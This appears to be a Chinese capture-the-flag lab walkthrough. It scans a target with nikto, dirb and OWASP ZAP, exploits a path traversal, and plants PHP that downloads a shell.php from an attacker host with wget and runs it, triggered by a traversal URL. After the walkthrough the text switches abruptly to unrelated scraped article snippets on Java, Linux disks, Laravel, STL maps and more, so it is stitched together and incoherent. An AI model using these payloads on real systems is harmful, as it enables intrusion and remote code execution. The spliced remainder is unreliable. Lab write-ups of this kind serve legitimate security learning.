信息探测与之前的操作一样,可以看到了开放了http80端口可以,尝试使用更加高级的方法进行扫描,其余的端口也可以尝试,看看是否有关键信息。
使用了nikto 以及dirb进行探测。我们尝试打开一些敏感信息。
之后打开,我们可以看到一个登陆输入密码的地方,这里可能存在漏洞,可以进行攻击。
使用owasp-zap
从扫描结果中可以看到,的确存在一个路径遍历的高危漏洞。
打开对应的URL
利用自带的反弹shell进行攻击。
记得修改对应的信息。IP以及监听端口号。
上传shell。
<?php system("cd /tmp;wget http://192.168.56.104/shell.php; chmod +x shell.php;php shell.php");?>
<?php system("cd /tmp; wget http://192.168.56.104:8000/shell.php;chmod +x shell.php;php shell.php");?>
再次登陆对应的网址,修改后面的信息。
http://192.168.56.102/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr/databases/shell.php
开启对应的服务,以及监听。
python -m "SimpleHTTPServer"
文章浏览阅读1.7w次,点赞10次,收藏74次。直接运行下发代码就能看到美丽的烟花啦,如下图:package com.inossem.mdm.controller;import java.applet.Applet;import java.awt.Color;import java.awt.Graphics;import java.net.URL;import java.util.Random;/*** 放烟花** @author 吕兴*/@S..._package com.inossem.mdm.controller; import java.applet.applet; import ja
文章浏览阅读540次。今天和大家分享多选树穿梭框的原型模板_axure树形多选原型下载
文章浏览阅读1.5k次。String uuid = UUID.randomUUID().toString().replace("-", “”).toLowerCase();_vba 唯一id生成函数
文章浏览阅读3.9k次。1. lsblk命令可以清晰的获取全局的块设备布局,如果未挂载,moutpoint点是空的。该命令会显示服务器上所有的硬盘,包含未挂载的。 df -h 命令 只显示挂载的硬盘概况 2. 查看未挂载硬盘的UUIDls -l /dev/disk/by-uuid/ 获取UUID3.vi编辑/etc/fstab文件系统信息,在最后加入未挂载硬盘信息。挂载信息编写遵循这些字段《file system》 《mount point》 《type》 《options》 ..._disk.enableuuid = "true
文章浏览阅读508次,点赞21次,收藏5次。讲解视频,并且后续会持续更新**
文章浏览阅读1.5k次。紧接上一篇,我们来完成用户修改密码这一部分。编写好我们的路由: Route::post('changepsd', 'ChangePosswordController@changepsd');然后创建一个控制器:<?phpnamespace App\Http\Controllers\Web\Admin;use Illuminate\Http\Requ..._laravel-admin 修改后台密码
文章浏览阅读3.3k次。map是STL里重要容器之一。它的特性总结来讲就是:所有元素都会根据元素的键值key自动排序(也可根据自定义的仿函数进行自定义排序),其中的每个元素都是<key,value>的键值对,map中不允许有键值相同的元素,因此map中元素的键值key不能修改,但是可以通过key修改与其对应的value。如果一定要修改与value对应的键值key,可将已存在的key删除掉,然后重新插入。定义原型:它作用应用场景可用作①字典 ②统计次数相关操作(1)插入操作方式有..._unordered_map用法
文章浏览阅读194次。一、视频在iOS中播放视频可以使用两个框架来实现:MediaPlayer框架的MPMoviePlayerController和MPMoviePlayerViewControllerAVFoundation框架中的AVPlayerAVKit框架的AVPlayerViewController【iOS8之后才有】但在近两年的WWDC上,MediaPlayer框架被iOS9标记为d...
文章浏览阅读1.6w次,点赞38次,收藏9次。 今天在写报告的时候,复制了一个论文里的参考文献,结果粘贴到Word变成下图的样子,而且无法改成英文字体,却可以在汉字字体中更改。网上找了一圈后,最后发现是全角和半角的问题。全角和半角指的是输入的英文字母或数字的大小,全角输入的英文字母及数字是正常汉字的一半,全角输入的和正常汉字等大。一个汉字要占两个英文字符的位置,人们把一个英文字符所占的位置称为"半角",相对地把一个汉字所占的位置称..._为什么word导出的pdf文件中time new roman字体变了
文章浏览阅读3.1k次。如何优雅的将pdf转换成图片 public static List<File> pdf2PngByAspose(File sourceFile, File destDir) { List<File> resultFiles = new ArrayList<>(); String path = sourceFile.getPath(); if (FileUtil.isPdf(sourceFi......_aspose pdf转图片
文章浏览阅读835次。0.机器学习中分类与预测算法的评价指标1)准确率2)速度3)强壮性(算法稳定)4)可规模性(适应于不同规模)5)可解释性(容易解释结果)1.基本流程1)定义:决策树是一个类似于流程图的树结构;其中,每个内部节点表示在一个属性上的测试,每个分支代表一个属性输出,而每个树叶节点代表类或类分布。树的最顶层是根结点;2)地位:决策树归纳是一类最简单也是最成功的机器学习方_布尔决策树
文章浏览阅读770次。文章目录第7章 链接7.2 静态链接7.3 目标文件7.4 可重定位目标文件7.5 符号和符号表7.6 符号解析7.7 重定位7.8 可执行目标文件7.9 加载可执行目标文件7.10 动态链接共享库7.11 从应用程序中加载和链接共享库7.12 位置无关代码7.13 库打桩机制第7章 链接链接是将各种代码和数据片段收集并组合成为一个单一文件的过程,这个文件可被加载到内存并执行。7.2 静态链..._csapp第七章笔记